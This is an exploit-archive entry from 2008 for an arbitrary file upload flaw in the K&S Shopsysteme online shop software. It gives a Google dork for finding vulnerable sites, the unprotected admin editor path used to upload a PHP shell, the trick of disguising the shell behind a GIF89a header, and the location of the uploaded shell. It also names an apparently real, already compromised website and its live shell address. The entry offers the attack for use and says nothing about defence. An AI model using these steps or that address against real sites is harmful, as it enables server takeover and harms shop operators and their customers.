K&S Shopsysteme Arbitrary Remote File Upload Vulnerability

2008-12-17T00:00:00
ID 1337DAY-ID-4485
Type zdt
Reporter mNt
Modified 2008-12-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
K&S Shopsysteme Arbitrary Remote File Upload Vulnerability
==========================================================


## Script Name: Shopsysteme (new version oscommerce)

## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 

## Author: mNt

## File Upload Bug

## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme icin yaklas?k 32.900 sonuctan 191 - 200 aras? sonuclar (0,51 saniye)]

## Use:

http://www.example.com/

after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php

File uploaded php shell

after in url: http://www.example.com/images/upload/mNt.php

Attention: Shell Code In GIF89;a

## Live demo: http://www.trampleandfetish.de/admin/editor/image.php

## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php



#  0day.today [2018-01-03]  #